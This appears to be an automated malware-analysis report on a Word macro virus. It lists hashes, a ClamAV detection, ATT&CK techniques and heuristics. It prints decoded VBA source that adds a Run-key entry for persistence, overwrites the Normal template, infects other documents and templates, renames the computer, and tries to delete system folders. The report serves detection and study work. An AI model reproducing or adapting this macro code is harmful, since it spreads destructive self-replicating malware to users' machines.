Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6cb7f79c7dbc59af…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-10-11 03:37:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: cdefab15a9d71bc00c9ab89c83afc2c6 SHA-1: ef2856b2bfd4d55c208695b8abca631f7329d4cc SHA-256: 6cb7f79c7dbc59afa33e783a02e51ac6e9f7029c625d3f3bfe1193ef1aeaa5be
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1505.003 Server Software Component: Visual Basic for Applications

The sample contains VBA macros that execute upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script attempts to establish persistence by writing the registry value 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\p.r.s' with the path 'C:\p.r.s.vbs'. It also attempts to embed itself into the Word Normal template by manipulating VBComponents.

Heuristics 5

  • ClamAV: Doc.Trojan.Lamoped-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lamoped-1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Open "C:\p.r.s.vbs" For Output As #1
Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "p.r.s = wscript.ScriptFullName"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End If
Private Sub Document_Open()
'W2000\VBS.P.R.S

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3589 bytes
SHA-256: dcc6dbaee886019e78581240f5dc79e6b101023db8a6c99ebaeda1b22df3635b
Detection
ClamAV: Doc.Trojan.Lamoped-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "THIS DOCUMENT"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub Document_Close()
On Error Resume Next
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "p.r.s") = "C:\p.r.s.vbs"
Open "C:\p.r.s.vbs" For Output As #1
Print #1, "Set wordobj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "p.r.s = wscript.ScriptFullName"
Print #1, "Set NT = wordobj.NormalTemplate.VBProject.VBComponents.Item(1)"
Print #1, "NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines"
Print #1, "NT.CodeModule.AddFromFile p.r.s"
Print #1, "NT.CodeModule.DeleteLines 1, 7"
Print #1, "wordobj.Quit"
Print #1, TD
Close #1
Set wordobj = CreateObject("Word.Application")
p.r.s = wscript.ScriptFullName
Set NT = wordobj.NormalTemplate.VBProject.VBComponents.Item(1)
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.CodeModule.AddFromFile p.r.s
NT.CodeModule.DeleteLines 1, 9
wordobj.Quit
End If
Next
For MainLoop = 1 To 2
If MainLoop = 1 Then Set Target = Documents Else Set Target = Templates
For TargetCount = 1 To Target.Count
Set TargetComponents = Target(TargetCount).VBProject.VBComponents
For ModuleCount = 1 To TargetComponents.Count
Function_Exist = False
TargetCodeChanged = False
For TargetLines = 1 To TargetComponents(ModuleCount).CodeModule.CountOfLines

If TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) = "Private Function p.r.s()" Then Function_Exist = True
If Left(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 12) = "Private Sub " And Right(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 8) <> ": p.r.s" Then
TargetComponents(ModuleCount).CodeModule.ReplaceLine TargetLines, TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) & ": p.r.s"
TargetCodeChanged = True

ElseIf Left(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 4) = "Sub " And Right(TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1), 8) <> ": p.r.s" Then
TargetComponents(ModuleCount).CodeModule.ReplaceLine TargetLines, TargetComponents(ModuleCount).CodeModule.Lines(TargetLines, 1) & ": p.r.s"
TargetCodeChanged = True
End If
Next
If Function_Exist = False Then TargetComponents(ModuleCount).CodeModule.AddFromString MyCode
If Function_Exits = False Or TargetCodeChanged = True Then

If MainLoop = 1 Then Documents(TargetCount).SaveAs FileName:=Documents(TargetCount).FullName
If MainLoop = 2 Then Templates(TargetCount).Save
End If
Next
Next
Next
End Function
Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" _
(ByVal lpComputerName As String) As Long
Name = SetComputerName("AHSAN JUTT VXER")
End If
Public Declare Function RemoveDirectory Lib "kernel32" Alias "RemoveDirectoryA" _
(ByVal lpPathName As String) As Long
If Day(Now()) = Int(Rnd() * 30 + 1) Then
num = Int(Rnd * 4) + 1 '
If num = 1 Then fuck$ = "C:\Windows"
If num = 2 Then fuck$ = "C:\Program Files"
If num = 3 Then fuck$ = "C:\My documents"
Lwinfuck = RemoveDirectory(fuck$)
End If
Private Sub Document_Open()
'W2000\VBS.P.R.S
'CREATED BY A.v_Killer(Pakbarin) PAKISTAN , SAHIWAL
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.